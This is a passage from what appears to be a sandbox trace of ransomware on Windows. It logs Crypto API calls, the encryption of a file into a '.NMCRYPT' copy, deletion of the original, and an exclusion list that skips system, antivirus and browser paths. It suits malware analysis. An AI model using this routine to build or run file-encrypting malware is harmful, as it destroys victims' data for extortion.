dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.621] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0147.621] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0147.622] CryptCreateHash (in: hProv=0x8e2cd0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444764 | out: phHash=0x1d444764) returned 1 [0147.622] CryptHashData (hHash=0x9ad678, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0147.622] CryptDeriveKey (in: hProv=0x8e2cd0, Algid=0x6610, hBaseData=0x9ad678, dwFlags=0x4, phKey=0x1d444768 | out: phKey=0x1d444768*=0x9ad278) returned 1 [0147.622] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0147.622] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0147.622] wcslen (_String="\\\\?\\") returned 0x4 [0147.622] CryptDuplicateKey (in: hKey=0x9ad278, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad478) returned 1 [0147.622] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsjpn.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0147.622] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsjpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0147.622] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=2522) returned 1 [0147.623] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0147.623] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.624] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.624] GetLastError () returned 0x0 [0147.624] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.625] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.625] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.625] GetLastError () returned 0x0 [0147.625] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.625] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.625] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.625] GetLastError () returned 0x0 [0147.625] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.625] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.625] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.626] GetLastError () returned 0x0 [0147.626] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.626] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.626] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.626] GetLastError () returned 0x0 [0147.626] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.626] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.626] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.626] GetLastError () returned 0x0 [0147.626] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.626] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.626] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.626] GetLastError () returned 0x0 [0147.626] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.626] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.626] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.626] GetLastError () returned 0x0 [0147.626] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.626] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.626] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.626] GetLastError () returned 0x0 [0147.626] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.626] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0xda, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0xda, lpOverlapped=0x0) returned 1 [0147.626] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0xda, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0xe0) returned 1 [0147.626] GetLastError () returned 0x0 [0147.626] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0xe0, lpOverlapped=0x0) returned 1 [0147.627] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0147.627] WriteFile (in: hFile=0x588, lpBuffer=0x1d421460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0147.627] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsjpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml")) returned 0x20 [0147.627] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsjpn.xml", dwFileAttributes=0x20) returned 0 [0147.627] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsjpn.xml") returned 1 [0147.627] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsjpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml")) returned 0 [0147.627] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsjpn.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsjpn.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsjpn.xml" [0147.627] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsjpn.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 1 [0147.627] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB390.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb390.tmp")) returned 0xb390 [0147.628] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsjpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB390.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb390.tmp"), dwFlags=0x1) returned 0 [0147.628] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB390.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb390.tmp")) returned 1 [0147.628] CryptDestroyKey (hKey=0x9ad478) returned 1 [0147.628] wcslen (_String="OK") returned 0x2 [0147.628] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0147.628] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0147.628] CryptDestroyKey (hKey=0x9ad278) returned 1 [0147.628] CryptDestroyHash (hHash=0x9ad678) returned 1 [0147.628] CryptReleaseContext (hProv=0x8e2cd0, dwFlags=0x0) returned 1 [0147.628] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0147.628] PathMatchSpecW (pszFile="ipskor.xml", pszSpec="*NMCRYPT") returned 0 [0147.628] PathMatchSpecW (pszFile="ipskor.xml", pszSpec="*Recovers your files.html") returned 0 [0147.629] PathMatchSpecW (pszFile="ipskor.xml", pszSpec="*.exe") returned 0 [0147.629] PathMatchSpecW (pszFile="ipskor.xml", pszSpec="*.dll") returned 0 [0147.629] PathMatchSpecW (pszFile="ipskor.xml", pszSpec="*.lnk") returned 0 [0147.629] PathMatchSpecW (pszFile="ipskor.xml", pszSpec="*.bat") returned 0 [0147.629] PathMatchSpecW (pszFile="ipskor.xml", pszSpec="*.ini") returned 0 [0147.629] PathMatchSpecW (pszFile="ipskor.xml", pszSpec="*.msi") returned 0 [0147.629] PathMatchSpecW (pszFile="ipskor.xml", pszSpec="*.scf") returned 0 [0147.629] PathMatchSpecW (pszFile="ipskor.xml", pszSpec="*pagefile.sys*") returned 0 [0147.629] PathMatchSpecW (pszFile="ipskor.xml", pszSpec="*NTUSER.DAT*") returned 0 [0147.629] PathMatchSpecW (pszFile="ipskor.xml", pszSpec="*AppData*") returned 0 [0147.629] PathMatchSpecW (pszFile="ipskor.xml", pszSpec="*\\winrar\\*") returned 0 [0147.629] PathMatchSpecW (pszFile="ipskor.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0147.629] PathMatchSpecW (pszFile="ipskor.xml", pszSpec="*\\java\\*") returned 0 [0147.629] PathMatchSpecW (pszFile="ipskor.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0147.629] PathMatchSpecW (pszFile="ipskor.xml", pszSpec="*\\windows\\*") returned 0 [0147.629] PathMatchSpecW (pszFile="ipskor.xml", pszSpec="*\\ESET\\*") returned 0 [0147.629] PathMatchSpecW (pszFile="ipskor.xml", pszSpec="*\\AVG\\*") returned 0 [0147.629] PathMatchSpecW (pszFile="ipskor.xml", pszSpec="*\\AVIRA\\*") returned 0 [0147.629] PathMatchSpecW (pszFile="ipskor.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0147.629] PathMatchSpecW (pszFile="ipskor.xml", pszSpec="*Atheros*") returned 0 [0147.629] PathMatchSpecW (pszFile="ipskor.xml", pszSpec="*Realtek*") returned 0 [0147.629] PathMatchSpecW (pszFile="ipskor.xml", pszSpec="*bootmgr*") returned 0 [0147.629] PathMatchSpecW (pszFile="ipskor.xml", pszSpec="*boot*") returned 0 [0147.629] PathMatchSpecW (pszFile="ipskor.xml", pszSpec="*boot*") returned 0 [0147.629] PathMatchSpecW (pszFile="ipskor.xml", pszSpec="*CONFIG.SYS*") returned 0 [0147.629] PathMatchSpecW (pszFile="ipskor.xml", pszSpec="*IO.SYS*") returned 0 [0147.629] PathMatchSpecW (pszFile="ipskor.xml", pszSpec="*MSDOS.SYS*") returned 0 [0147.629] PathMatchSpecW (pszFile="ipskor.xml", pszSpec="*NTDETECT.COM*") returned 0 [0147.629] PathMatchSpecW (pszFile="ipskor.xml", pszSpec="*ntldr*") returned 0 [0147.629] PathMatchSpecW (pszFile="ipskor.xml", pszSpec="*chrome*") returned 0 [0147.629] PathMatchSpecW (pszFile="ipskor.xml", pszSpec="*opera*") returned 0 [0147.629] PathMatchSpecW (pszFile="ipskor.xml", pszSpec="*firefox*") returned 0 [0147.629] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipskor.xml", pszSpec="*") returned 1 [0147.629] strlen (_Str="NMoreira") returned 0x8 [0147.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.629] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.630] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: 